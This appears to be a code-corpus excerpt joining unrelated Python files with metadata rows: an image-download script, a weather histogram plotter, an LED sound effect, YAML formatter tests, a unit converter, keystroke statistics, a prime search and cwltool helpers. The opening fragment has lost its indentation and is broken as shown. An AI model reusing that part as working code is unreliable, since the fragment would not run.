        # which returns, e.g.:
        # u'528'
def usage():
"""Returns usage message."""
return "Usage: %s\n" \
"-d\t--database\tUses a specific <database>\n" \
"-o\t--download\n" \
"-r\t--repetition\tDefines the number of repetitions\n" \
"-h\t--help\t\tThis help" % sys.argv[0]
def download(rep):
""" """
home = os.path.abspath(os.environ['HOME'])
dirName = join(home, 'tmp', 'img')
if os.path.exists(dirName):
os.chdir(dirName)
else:
sys.exit(1)
    # run the easy stuff, create a thread and make it download a captcha image
i = 0
for x in range(rep):
# startTime = datetime.datetime.now()
mythread = MyThread(name = "Thread-%d" % (x + 1))
mythread.start()
if i > 50:
time.sleep(3)
i = 0
i += 1
def parseImgFile(dbHandler):
""" """
home = os.path.abspath(os.environ['HOME'])
dirName = join(home, 'tmp', 'img')
if os.path.exists(dirName):
files = os.listdir(dirName)
for filename in files:
f = open(join(dirName, filename), 'rb')
h = hashlib.sha1()
h.update(f.read())
fileHash = h.hexdigest()
fileSize = getsize(join(dirName, filename))
f.close()
dbHandler.saveData(str(filename), str(fileHash), fileSize)
else:
print dirName + 'is not available'
sys.exit(1)
dbHandler.closeDB()
def main():
database = None
repetition = None
down = False
try:
opts, args = getopt.getopt(sys.argv[1:], "hod:r:", ["help", "download", "database=", "repetition="])
except getopt.GetoptError as err:
print(err)
print usage()
sys.exit(2)
for option, value in opts:
if option in ('-h', '--help'):
print usage()
sys.exit(0)
elif option in ('-o', '--download'):
down = True
elif option in ('-r', '--repetition'):
repetition = value
elif option in ('-d', '--database'):
database = value
else:
assert False, "unhandled option"
# download the image files
if repetition > 0 and down:
download(int(repetition))
# if a database was set, handle the downloaded files
if database:
myDB = IMBDataBase(database)
parseImgFile(myDB)
if __name__ == '__main__':
main()
| mit | 4,252,157,633,065,306,000 | 29.418539 | 122 | 0.574938 | false | 3.799649 | false | false | false |
akrherz/iem | htdocs/plotting/auto/scripts/p19.py | 1 | 7899 | """histogram"""
import datetime
from collections import OrderedDict
import numpy as np
import pandas as pd
from pandas.io.sql import read_sql
from matplotlib.font_manager import FontProperties
from pyiem import network
from pyiem.plot import figure, get_cmap
from pyiem.util import get_autoplot_context, get_dbconn
from pyiem.exceptions import NoDataFound
# Use OrderedDict to keep webform select in this same order!
MDICT = OrderedDict(
[
("all", "No Month/Season Limit"),
("spring", "Spring (MAM)"),
("fall", "Fall (SON)"),
("winter", "Winter (DJF)"),
("summer", "Summer (JJA)"),
("jan", "January"),
("feb", "February"),
("mar", "March"),
("apr", "April"),
("may", "May"),
("jun", "June"),
("jul", "July"),
("aug", "August"),
("sep", "September"),
("oct", "October"),
("nov", "November"),
("dec", "December"),
]
)
def get_description():
""" Return a dict describing how to call this plotter """
desc = dict()
desc["data"] = True
desc[
"description"
] = """This chart displays a histogram of daily high
and low temperatures for a station of your choice. If you optionally
choose to overlay a given year's data and select winter, the year of
the December is used for the plot. For example, the winter of 2017 is
Dec 2017 thru Feb 2018. The plot details the temperature bin with the
highest frequency."""
desc["arguments"] = [
dict(
type="station",
name="station",
default="IA0200",
label="Select Station:",
network="IACLIMATE",
),
dict(
type="int",
name="binsize",
default="10",
label="Histogram Bin Size:",
),
dict(
type="select",
name="month",
default="all",
label="Month Limiter",
options=MDICT,
),
dict(
type="year",
optional=True,
default=datetime.date.today().year,
label="Optional: Overlay Observations for given year",
name="year",
),
dict(type="cmap", name="cmap", default="Blues", label="Color Ramp:"),
]
return desc
def plotter(fdict):
""" Go """
pgconn = get_dbconn("coop")
ctx = get_autoplot_context(fdict, get_description())
station = ctx["station"]
binsize = ctx["binsize"]
month = ctx["month"]
year = ctx.get("year")
table = "alldata_%s" % (station[:2],)
nt = network.Table("%sCLIMATE" % (station[:2],))
if month == "all":
months = range(1, 13)
elif month == "fall":
months = [9, 10, 11]
elif month == "winter":
months = [12, 1, 2]
elif month == "spring":
months = [3, 4, 5]
elif month == "summer":
months = [6, 7, 8]
else:
ts = datetime.datetime.strptime("2000-" + month + "-01", "%Y-%b-%d")
# make sure it is length two for the trick below in SQL
months = [ts.month, 999]
ddf = read_sql(
f"SELECT high, low, year, month from {table} WHERE station = %s "
"and year > 1892 and high >= low and month in %s",
pgconn,
params=(station, tuple(months)),
index_col=None,
)
if ddf.empty:
raise NoDataFound("No Data Found.")
ddf["range"] = ddf["high"] - ddf["low"]
xbins = np.arange(ddf["low"].min() - 3, ddf["low"].max() + 3, binsize)
ybins = np.arange(ddf["high"].min() - 3, ddf["high"].max() + 3, binsize)
hist, xedges, yedges = np.histogram2d(
ddf["low"], ddf["high"], [xbins, ybins]
)
rows = []
for i, xedge in enumerate(xedges[:-1]):
for j, yedge in enumerate(yedges[:-1]):
rows.append(dict(high=yedge, low=xedge, count=hist[i, j]))
df = pd.DataFrame(rows)
ab = nt.sts[station]["archive_begin"]
if ab is None:
raise NoDataFound("Unknown station metadata.")
years = float(datetime.datetime.now().year - ab.year)
hist = np.ma.array(hist / years)
hist.mask = np.where(hist < (1.0 / years), True, False)
ar = np.argwhere(hist.max() == hist)
title = f"[{station}] {nt.sts[station]['name']}"
subtitle = (
"Daily High vs Low Temperature Histogram + Range between Low + High "
f"(month={month.upper()})"
)
fig = figure(title=title, subtitle=subtitle)
kax = fig.add_axes([0.65, 0.5, 0.3, 0.36])
kax.grid(True)
kax.text(
0.02,
1.02,
"Daily Temperature Range Histogram + CDF",
transform=kax.transAxes,
bbox=dict(color="tan"),
va="bottom",
)
kax.hist(ddf["range"].values, density=True, color="lightgreen")
kax.set_ylabel("Density")
kax2 = kax.twinx()
kax2.set_ylabel("Cumulative Density")
kax2.hist(
ddf["range"].values,
density=True,
cumulative=100,
histtype="step",
color="k",
)
kax.set_xlim((kax.get_xlim()[0], ddf["range"].max()))
# Table of Percentiles
ranks = ddf["range"].quantile(np.arange(0, 1.0001, 0.0025))
xpos = 0.62
ypos = 0.37
fig.text(
0.65,
ypos + 0.03,
"Daily Temperature Range Percentiles",
bbox=dict(color="tan"),
)
fig.text(xpos - 0.01, ypos - 0.01, "Percentile Value")
ypos -= 0.01
monofont = FontProperties(family="monospace")
for (q, val) in ranks.iteritems():
if 0.02 < q < 0.98 and (q * 100.0 % 10) != 0:
continue
if q > 0.1 and int(q * 100) in [20, 90]:
xpos += 0.13
ypos = 0.37
fig.text(xpos - 0.01, ypos - 0.01, "Percentile Value")
ypos -= 0.01
ypos -= 0.025
label = f"{q * 100:-6g} {val:-6.0f}"
fig.text(xpos, ypos, label, fontproperties=monofont)
ax = fig.add_axes([0.07, 0.17, 0.5, 0.73])
res = ax.pcolormesh(xedges, yedges, hist.T, cmap=get_cmap(ctx["cmap"]))
cax = fig.add_axes([0.07, 0.08, 0.5, 0.01])
fig.colorbar(res, label="Days per Year", orientation="horizontal", cax=cax)
ax.grid(True)
ax.set_ylabel(r"High Temperature $^{\circ}\mathrm{F}$")
ax.set_xlabel(r"Low Temperature $^{\circ}\mathrm{F}$")
xmax = ar[0][0]
ymax = ar[0][1]
ax.text(
0.65,
0.15,
("Largest Frequency: %.1d days\n" "High: %.0d-%.0d Low: %.0d-%.0d")
% (
hist[xmax, ymax],
yedges[ymax],
yedges[ymax + 1],
xedges[xmax],
xedges[xmax + 1],
),
ha="center",
va="center",
transform=ax.transAxes,
bbox=dict(color="white"),
)
if ddf["high"].min() < 32:
ax.axhline(32, linestyle="-", lw=1, color="k")
ax.text(
ax.get_xlim()[1],
32,
r"32$^\circ$F",
va="center",
ha="right",
color="white",
bbox=dict(color="k"),
fontsize=8,
)
if ddf["low"].min() < 32:
ax.axvline(32, linestyle="-", lw=1, color="k")
ax.text(
32,
ax.get_ylim()[1],
r"32$^\circ$F",
va="top",
ha="center",
color="white",
bbox=dict(facecolor="k", edgecolor="none"),
fontsize=8,
)
if year:
label = str(year)
if month == "winter":
ddf["year"] = (
ddf[((ddf["month"] == 1) | (ddf["month"] == 2))]["year"] - 1
)
label = "Dec %s - Feb %s" % (year, year + 1)
ddf2 = ddf[ddf["year"] == year]
ax.scatter(
ddf2["low"],
ddf2["high"],
marker="o",
s=30,
label=label,
edgecolor="yellow",
facecolor="red",
)
ax.legend()
return fig, df
if __name__ == "__main__":
plotter(dict())
| mit | -73,954,351,743,601,700 | 29.034221 | 79 | 0.515888 | false | 3.317514 | false | false | false |
JohnOmernik/pimeup | ledsound/LED_Sound.py | 1 | 2592 | #!/usr/bin/python
import time
import random
import sys
import alsaaudio
import wave
import sys
import struct
import math
from dotstar import Adafruit_DotStar
numpixels = 60 # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = 23
clockpin = 24
defaultColor = 0x0000FF
defaultBright = 32
flashColor = 0xF0F0FF
flashBright = 255
strip = Adafruit_DotStar(numpixels, datapin, clockpin)
strip.setBrightness(defaultBright)
strip.begin() # Initialize pins for output
hi_thres = 200
low_thres = 100
lightning = False
def main():
global strip
global lightning
sounds = [0, 0, 0]
channels = 2
rate = 44100
size = 1024
out_stream = alsaaudio.PCM(alsaaudio.PCM_PLAYBACK, alsaaudio.PCM_NORMAL, 'default')
out_stream.setformat(alsaaudio.PCM_FORMAT_S16_LE)
out_stream.setchannels(channels)
out_stream.setrate(rate)
out_stream.setperiodsize(size)
strip.setBrightness(defaultBright)
setAllLEDS(strip, [defaultColor])
strip.show()
thunderfiles = ['thunder.wav']
while True:
curfile = random.choice(thunderfiles)
curstream = open(curfile, "rb")
data = curstream.read(size)
tstart = 0
while data:
tstart += 1
out_stream.write(data)
data = curstream.read(size)
rmsval = rms(data)
sounds.append(rmsval)
ug = sounds.pop(0)
sounds_avg = sum(sounds) / len(sounds)
print(sounds_avg)
if sounds_avg > hi_thres and lightning == False:
strip.setBrightness(flashBright)
setAllLEDS(strip, [flashColor])
lightning = True
if sounds_avg < low_thres and lightning == True:
strip.setBrightness(defaultBright)
            setAllLEDS(strip, [defaultColor])
lightning = False
curstream.close()
sys.exit(0)
def setAllLEDS(strip, colorlist):
numcolors = len(colorlist)
for x in range(numpixels):
idx = x % numcolors
strip.setPixelColor(x, colorlist[idx])
strip.show()
def rms(frame):
SHORT_NORMALIZE = (1.0/32768.0)
CHUNK = 1024
swidth = 2
count = len(frame)/swidth
format = "%dh"%(count)
shorts = struct.unpack( format, frame )
sum_squares = 0.0
for sample in shorts:
n = sample * SHORT_NORMALIZE
sum_squares += n*n
rms = math.pow(sum_squares/count,0.5);
return rms * 10000
if __name__ == "__main__":
main()
| apache-2.0 | 2,788,391,041,103,778,300 | 21.53913 | 87 | 0.609568 | false | 3.383812 | false | false | false |
dtroyer/cliff | cliff/tests/test_formatters_yaml.py | 1 | 3058 | #!/usr/bin/env python
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import yaml
from cliff.formatters import yaml_format
from cliff.tests import base
from cliff.tests import test_columns
import mock
class TestYAMLFormatter(base.TestBase):
def test_format_one(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c', 'd')
d = ('A', 'B', 'C', '"escape me"')
expected = {
'a': 'A',
'b': 'B',
'c': 'C',
'd': '"escape me"'
}
output = six.StringIO()
args = mock.Mock()
sf.emit_one(c, d, output, args)
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
def test_formattablecolumn_one(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c', 'd')
d = ('A', 'B', 'C', test_columns.FauxColumn(['the', 'value']))
expected = {
'a': 'A',
'b': 'B',
'c': 'C',
'd': ['the', 'value'],
}
args = mock.Mock()
sf.add_argument_group(args)
args.noindent = True
output = six.StringIO()
sf.emit_one(c, d, output, args)
value = output.getvalue()
print(len(value.splitlines()))
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
def test_list(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c')
d = (
('A1', 'B1', 'C1'),
('A2', 'B2', 'C2'),
('A3', 'B3', 'C3')
)
expected = [
{'a': 'A1', 'b': 'B1', 'c': 'C1'},
{'a': 'A2', 'b': 'B2', 'c': 'C2'},
{'a': 'A3', 'b': 'B3', 'c': 'C3'}
]
output = six.StringIO()
args = mock.Mock()
sf.add_argument_group(args)
sf.emit_list(c, d, output, args)
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
def test_formattablecolumn_list(self):
sf = yaml_format.YAMLFormatter()
c = ('a', 'b', 'c')
d = (
('A1', 'B1', test_columns.FauxColumn(['the', 'value'])),
)
expected = [
{'a': 'A1', 'b': 'B1', 'c': ['the', 'value']},
]
args = mock.Mock()
sf.add_argument_group(args)
args.noindent = True
output = six.StringIO()
sf.emit_list(c, d, output, args)
actual = yaml.safe_load(output.getvalue())
self.assertEqual(expected, actual)
| apache-2.0 | -9,176,197,613,891,788,000 | 29.58 | 76 | 0.519294 | false | 3.43982 | true | false | false |
orestkreminskyi/taf | utils/iperflexer/unitconverter.py | 2 | 10932 | """
Copyright (c) 2014 Russell Nakamura
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify,
merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so,
subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH
THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
class UnitNames(object):
"""
Unit Names is a namespace to hold units
"""
__slots__ = ()
# bits
bits = "bits"
kbits = "K" + bits
kilobits = kbits
mbits = "M" + bits
megabits = mbits
gbits = "G" + bits
gigabits = gbits
tbits = "T" + bits
terabits = tbits
pbits = "P" + bits
petabits = pbits
ebits = "E" + bits
exabits = ebits
zbits = "Z" + bits
zettabits = zbits
ybits = "Y" + bits
yottabits = ybits
# bytes
bytes = "Bytes"
kbytes = "K" + bytes
kilobytes = kbytes
mbytes = "M" + bytes
megabytes = mbytes
gbytes = "G" + bytes
gigabytes = gbytes
tbytes = "T" + bytes
terabytes = tbytes
pbytes = "P" + bytes
petabytes = pbytes
ebytes = "E" + bytes
exabytes = ebytes
zbytes = 'Z' + bytes
zettabytes = zbytes
ybytes = 'Y' + bytes
yottabytes = ybytes
class BinaryUnitNames(object):
"""
namespace for binary-unit names
"""
bits = UnitNames.bits
bibits = 'bi' + bits
kibibits = "ki" + bibits
mebibits = 'me' + bibits
gibibits = "gi" + bibits
tebibits = "te" + bibits
pebibits = "pe" + bibits
exbibits = "ex" + bibits
zebibits = "ze" + bibits
yobibits = "yo" + bibits
bytes = 'bytes'
bibytes = 'bi' + bytes
kibibytes = "ki" + bibytes
mebibytes = "me" + bibytes
gibibytes = 'gi' + bibytes
tebibytes = 'te' + bibytes
pebibytes = 'pe' + bibytes
exbibytes = "ex" + bibytes
zebibytes = "ze" + bibytes
yobibytes = "yo" + bibytes
# iperf base 2
iperf_bytes = UnitNames.bytes
iperf_kibibytes = UnitNames.kbytes
iperf_mebibytes = UnitNames.mbytes
iperf_gibibytes = UnitNames.gbytes
iperf_tebibytes = UnitNames.tbytes
iperf_pebibytes = UnitNames.pbytes
iperf_exbibytes = UnitNames.ebytes
iperf_zebibytes = UnitNames.zbytes
iperf_yobibytes = UnitNames.ybytes
# end BinaryUnitNames
IDENTITY = 1
ONE = 1.0
BYTE = 8
TO_BYTE = ONE/BYTE
class BaseConverter(dict):
"""
A creator of unit-conversion dictionaries
"""
def __init__(self, to_units, kilo_prefix):
"""
base_converter constructor
:param:
- `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes)
- `kilo_prefix`: kilo multiplier matching type of units
"""
self.to_units = to_units
self.kilo_prefix = kilo_prefix
self._prefix_conversions = None
self._bits_to_bytes = None
self._bytes_to_bits = None
# split the to_units list for later
self.bit_conversions = self.byte_conversions = len(to_units)//2
self.bit_units = to_units[:self.bit_conversions]
self.byte_units = to_units[self.byte_conversions:]
return
@property
def prefix_conversions(self):
"""
List of lists of prefix conversions
"""
if self._prefix_conversions is None:
# start with list that assumes value has no prefix
# this list is for 'bits' or 'bytes'
# the values will be 1, 1/kilo, 1/mega, etc.
start_list = [self.kilo_prefix**(-power)
for power in range(self.bit_conversions)]
self._prefix_conversions = self.conversions(conversion_factor=1,
start_list=start_list)
return self._prefix_conversions
@property
def bits_to_bytes(self):
"""
List of conversions for bits to bytes
"""
if self._bits_to_bytes is None:
self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)
return self._bits_to_bytes
@property
def bytes_to_bits(self):
"""
list of conversions for bytes to bits
"""
if self._bytes_to_bits is None:
self._bytes_to_bits = self.conversions(conversion_factor=BYTE)
return self._bytes_to_bits
def conversions(self, conversion_factor, start_list=None):
"""
Creates the converter-lists
:param:
- `conversion_factor`: multiplier for values (8 or 1/8, or 1)
- `start_list`: if given, use to start the conversion-list
:return: list of conversion_lists
"""
if start_list is None:
# assume that prefix_conversions exists (not safe, but...)
start_list = self.prefix_conversions[0]
# start with byte_factor times the base conversions (1, 1/kilo, etc.)
converter_list = [[conversion_factor * conversion
for conversion in start_list]]
for previous in range(self.bit_conversions - 1):
# 'pop' last item from previous list
# and prepend one higher-power conversion
next_conversions = ([self.kilo_prefix**(previous+1) * conversion_factor] +
converter_list[previous][:-1])
converter_list.append(next_conversions)
return converter_list
def build_conversions(self):
"""
builds the dictionary
"""
# from bits to bits or bytes
for index, units in enumerate(self.bit_units):
self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] +
self.bits_to_bytes[index])))
# from bytes to bits or bytes
for index, units in enumerate(self.byte_units):
self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] +
self.prefix_conversions[index])))
return
# end class BaseConverter
bit_units = [UnitNames.bits,
UnitNames.kbits,
UnitNames.mbits,
UnitNames.gbits,
UnitNames.terabits,
UnitNames.petabits,
UnitNames.exabits,
UnitNames.zettabits,
UnitNames.yottabits]
byte_units = [UnitNames.bytes,
UnitNames.kbytes,
UnitNames.mbytes,
UnitNames.gbytes,
UnitNames.terabytes,
UnitNames.petabytes,
UnitNames.exabytes,
UnitNames.zettabytes,
UnitNames.yottabytes]
decimal_to_units = bit_units + byte_units
KILO = 10**3
class UnitConverter(BaseConverter):
"""
The UnitConverter makes conversions based on a base-10 system
"""
def __init__(self):
super(UnitConverter, self).__init__(to_units=decimal_to_units,
kilo_prefix=KILO)
self.build_conversions()
return
# end class UnitConverter
DecimalUnitConverter = UnitConverter
to_bits = [BinaryUnitNames.bits,
BinaryUnitNames.kibibits,
BinaryUnitNames.mebibits,
BinaryUnitNames.gibibits,
BinaryUnitNames.tebibits,
BinaryUnitNames.pebibits,
BinaryUnitNames.exbibits,
BinaryUnitNames.zebibits,
BinaryUnitNames.yobibits]
to_bytes = [BinaryUnitNames.bytes,
BinaryUnitNames.kibibytes,
BinaryUnitNames.mebibytes,
BinaryUnitNames.gibibytes,
BinaryUnitNames.tebibytes,
BinaryUnitNames.pebibytes,
BinaryUnitNames.exbibytes,
BinaryUnitNames.zebibytes,
BinaryUnitNames.yobibytes]
binary_to_units = to_bits + to_bytes
KIBI = 2**10
class BinaryUnitconverter(BaseConverter):
"""
The BinaryUnitconverter is a conversion lookup table for binary data
Usage::
converted = old * UnitConverter[old units][new units]
Use class UnitNames to get valid unit names
"""
def __init__(self):
super(BinaryUnitconverter, self).__init__(to_units=binary_to_units,
kilo_prefix=KIBI)
self.build_conversions()
return
# end class BinaryUnitConverter
to_bits = [BinaryUnitNames.bits,
BinaryUnitNames.kibibits,
BinaryUnitNames.mebibits,
BinaryUnitNames.gibibits,
BinaryUnitNames.tebibits,
BinaryUnitNames.pebibits,
BinaryUnitNames.exbibits,
BinaryUnitNames.zebibits,
BinaryUnitNames.yobibits]
to_bytes = [BinaryUnitNames.iperf_bytes,
BinaryUnitNames.iperf_kibibytes,
BinaryUnitNames.iperf_mebibytes,
BinaryUnitNames.iperf_gibibytes,
BinaryUnitNames.iperf_tebibytes,
BinaryUnitNames.iperf_pebibytes,
BinaryUnitNames.iperf_exbibytes,
BinaryUnitNames.iperf_zebibytes,
BinaryUnitNames.iperf_yobibytes]
iperf_binary_to_units = to_bits + to_bytes
class IperfbinaryConverter(BaseConverter):
"""
The IperfbinaryConverter is a conversion lookup table for binary data
Usage::
converter = IperfbinaryConverter()
converted = old * converter[old units][new units]
Use class UnitNames to get valid unit names
"""
def __init__(self):
super(IperfbinaryConverter, self).__init__(to_units=iperf_binary_to_units,
kilo_prefix=KIBI)
self.build_conversions()
return
# end class BinaryUnitConverter
if __name__ == "__builtin__":
unit_converter = UnitConverter()
bits = 10**6
converted = bits * unit_converter['bits']['Mbits']
print("{0} Mbits".format(converted))
if __name__ == "__builtin__":
binary_converter = BinaryUnitconverter()
MBytes = 1
bits = MBytes * binary_converter[BinaryUnitNames.mebibytes][UnitNames.bits]
print("{0:,} bits".format(bits))
if __name__ == '__builtin__':
mbits = bits * unit_converter[UnitNames.bits][UnitNames.mbits]
print('{0} Mbits'.format(mbits))
| apache-2.0 | 8,128,448,898,096,653,000 | 29.707865 | 97 | 0.607757 | false | 3.797152 | false | false | false |
Titan-C/helpful_scripts | pyutils/keystats.py | 1 | 1455 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
r"""
Follow statistics of my keystrokes
==================================
"""
# Created Wed Sep 16 18:40:15 2015
# Author: Óscar Nájera
from __future__ import division, absolute_import, print_function
import re
import os
import collections
import argparse
parser = argparse.ArgumentParser(description='Key press statistics')
parser.add_argument('-file', default=os.path.expanduser('~/keylog'),
help='Key pressing log file')
parser.add_argument('-txt', action='store_true',
help='is it a text file?')
parser.add_argument('-chr', action='store_true',
help='Count the shift chording ')
arguments = parser.parse_args()
with open(arguments.file, 'r') as keyshom:
data = keyshom.read()
if not arguments.txt:
    kdata = re.findall(r'KeyPress.*?\[(\w+)\]', data)
else:
    kdata = data
if arguments.chr:
print('yo')
kdata = re.findall(r'KeyPress.*?\[(\w+)\].*?\[Shift.*?\]', data)
collstat = collections.Counter(kdata)
print('Most typed characters')
for i, (char, count) in enumerate(collstat.most_common()):
print(i, char, count)
if arguments.txt:
pair_data = re.findall(r'(\w.)', kdata) + re.findall(r'(.\w)', kdata)
else:
pair_data = list(zip(kdata[:-1], kdata[1:]))
pair_stat = collections.Counter(pair_data)
print('Most recurrent key successions')
for i, (pair, count) in enumerate(pair_stat.most_common(50)):
print(i, pair, count)
| gpl-2.0 | 999,833,351,648,647,800 | 27.490196 | 73 | 0.638679 | false | 3.27991 | false | false | false |
AustinHartman/randomPrograms | euler50.py | 1 | 1672 | import math
import time
def prime_list(lower, upper):
p_ls = [2, 3, 5, 7]
for n in range(lower, upper, 2):
p = True
for d in range(3, int(math.sqrt(n)) + 1):
if n % d == 0:
p = False
break
if p:
p_ls.append(n)
return p_ls
def is_prime(x):
if x % 2 == 0:
return False
d = 3
upper = int(abs(x) ** 0.5 + 1)
while d <= upper:
if x % d == 0:
return False
d += 2
return True
def prime_generator():
num = 5
while True:
prime = True
for d in range(3, int(num ** 0.5 + 1)):
if num % d == 0:
prime = False
break
if prime:
yield num
num += 2
start = time.time()
gen = prime_generator()
primes = [2, 3]
n = 5
longest = 0
total = 0
length = 0
prime = 0
keep_checking_num = True
l = 0
while n < 1000001:
if not is_prime(n):
n += 2
continue
while primes[-1] < n:
primes.append(gen.__next__())
keep_checking_num = True
l = 0
while keep_checking_num:
l += 1
length = 0
total = 0
for i in range(l, len(primes)):
total += primes[i]
length += 1
if total > n:
break
if total == n:
if length > longest:
longest = length
prime = n
print(prime)
keep_checking_num = False
n += 2
print(longest, prime)
print(time.time()-start)
# incomplete scratch left over at the end of the file:
# for i in range(primes):
#     for n in range(primes):
#         if sum(primes)
| gpl-3.0 | -2,495,375,094,756,850,700 | 17.786517 | 49 | 0.44378 | false | 3.557447 | false | false | false |
dleehr/cwltool | cwltool/utils.py | 1 | 8161 | """Shared functions and other definitions."""
from __future__ import absolute_import
import collections
import os
import platform
import random
import shutil
import string
import sys
import tempfile
from functools import partial # pylint: disable=unused-import
from typing import (IO, Any, AnyStr, Callable, # pylint: disable=unused-import
Dict, Iterable, List, MutableMapping, MutableSequence,
Optional, Union)
import pkg_resources
from mypy_extensions import TypedDict
from schema_salad.utils import json_dump, json_dumps # pylint: disable=unused-import
from six.moves import urllib, zip_longest
from typing_extensions import Deque, Text # pylint: disable=unused-import
# move to a regular typing import when Python 3.3-3.6 is no longer supported
# no imports from cwltool allowed
if os.name == 'posix':
if sys.version_info < (3, 5):
import subprocess32 as subprocess # pylint: disable=unused-import
else:
import subprocess # pylint: disable=unused-import
else:
import subprocess # type: ignore
windows_default_container_id = "frolvlad/alpine-bash"
Directory = TypedDict('Directory',
{'class': Text, 'listing': List[Dict[Text, Text]],
'basename': Text})
DEFAULT_TMP_PREFIX = tempfile.gettempdir() + os.path.sep
processes_to_kill = collections.deque() # type: Deque[subprocess.Popen]
def versionstring():
# type: () -> Text
'''
version of CWLtool used to execute the workflow.
'''
pkg = pkg_resources.require("cwltool")
if pkg:
return u"%s %s" % (sys.argv[0], pkg[0].version)
return u"%s %s" % (sys.argv[0], "unknown version")
def aslist(l): # type: (Any) -> MutableSequence[Any]
"""Wraps any non-MutableSequence/list in a list."""
if isinstance(l, MutableSequence):
return l
return [l]
def copytree_with_merge(src, dst): # type: (Text, Text) -> None
if not os.path.exists(dst):
os.makedirs(dst)
shutil.copystat(src, dst)
lst = os.listdir(src)
for item in lst:
spath = os.path.join(src, item)
dpath = os.path.join(dst, item)
if os.path.isdir(spath):
copytree_with_merge(spath, dpath)
else:
shutil.copy2(spath, dpath)
def docker_windows_path_adjust(path):
# type: (Optional[Text]) -> Optional[Text]
r"""
    Changes only Windows paths so that they can be appropriately passed to the
    docker run command, as Docker treats them as Unix paths.
Example: 'C:\Users\foo to /C/Users/foo (Docker for Windows) or /c/Users/foo
(Docker toolbox).
"""
if path is not None and onWindows():
split = path.split(':')
if len(split) == 2:
if platform.win32_ver()[0] in ('7', '8'): # type: ignore
split[0] = split[0].lower() # Docker toolbox uses lowecase windows Drive letters
else:
split[0] = split[0].capitalize()
# Docker for Windows uses uppercase windows Drive letters
path = ':'.join(split)
path = path.replace(':', '').replace('\\', '/')
return path if path[0] == '/' else '/' + path
return path
def docker_windows_reverse_path_adjust(path):
# type: (Text) -> (Text)
r"""
    Change a Docker path (only on Windows OS) appropriately back to a Windows path.
Example: /C/Users/foo to C:\Users\foo
"""
if path is not None and onWindows():
if path[0] == '/':
path = path[1:]
else:
raise ValueError("not a docker path")
splitpath = path.split('/')
splitpath[0] = splitpath[0]+':'
return '\\'.join(splitpath)
return path
def docker_windows_reverse_fileuri_adjust(fileuri):
# type: (Text) -> (Text)
r"""
    On Docker on Windows, file URIs do not contain ':' in the path.
    To convert such a file URI to a Windows-compatible one, add ':' after the drive letter,
so file:///E/var becomes file:///E:/var
"""
if fileuri is not None and onWindows():
if urllib.parse.urlsplit(fileuri).scheme == "file":
filesplit = fileuri.split("/")
if filesplit[3][-1] != ':':
filesplit[3] = filesplit[3]+':'
return '/'.join(filesplit)
return fileuri
raise ValueError("not a file URI")
return fileuri
def onWindows():
# type: () -> (bool)
""" Check if we are on Windows OS. """
return os.name == 'nt'
def convert_pathsep_to_unix(path): # type: (Text) -> (Text)
"""
    On Windows os.path.join uses backslashes to join paths; since we use
    these paths inside Docker, convert them to use forward slashes: /
"""
if path is not None and onWindows():
return path.replace('\\', '/')
return path
def cmp_like_py2(dict1, dict2): # type: (Dict[Text, Any], Dict[Text, Any]) -> int
"""
    Comparison function to be used in sorting, as Python 3 doesn't allow sorting
    of different types like str() and int().
    This function re-creates the Python 2 sorting behaviour for heterogeneous
    lists of `int` and `str`.
"""
# extract lists from both dicts
first, second = dict1["position"], dict2["position"]
# iterate through both list till max of their size
for i, j in zip_longest(first, second):
if i == j:
continue
# in case 1st list is smaller
# should come first in sorting
if i is None:
return -1
# if 1st list is longer,
# it should come later in sort
elif j is None:
return 1
# if either of the list contains str element
# at any index, both should be str before comparing
if isinstance(i, str) or isinstance(j, str):
return 1 if str(i) > str(j) else -1
# int comparison otherwise
return 1 if i > j else -1
# if both lists are equal
return 0
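# Usage sketch (illustrative, not executed here): under Python 3 this comparator
# has to be wrapped with functools.cmp_to_key when sorting binding dictionaries
# by their "position" lists, e.g.
#
#   from functools import cmp_to_key
#   bindings = [{"position": [2, "b"]}, {"position": [1]}, {"position": [1, "a"]}]
#   bindings.sort(key=cmp_to_key(cmp_like_py2))
#   # -> [{"position": [1]}, {"position": [1, "a"]}, {"position": [2, "b"]}]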
def bytes2str_in_dicts(inp # type: Union[MutableMapping[Text, Any], MutableSequence[Any], Any]
):
# type: (...) -> Union[Text, MutableSequence[Any], MutableMapping[Text, Any]]
"""
    Convert any present byte string to a unicode string, in place.
    The input is a dict of nested dicts and lists.
"""
# if input is dict, recursively call for each value
if isinstance(inp, MutableMapping):
for k in inp:
inp[k] = bytes2str_in_dicts(inp[k])
return inp
# if list, iterate through list and fn call
# for all its elements
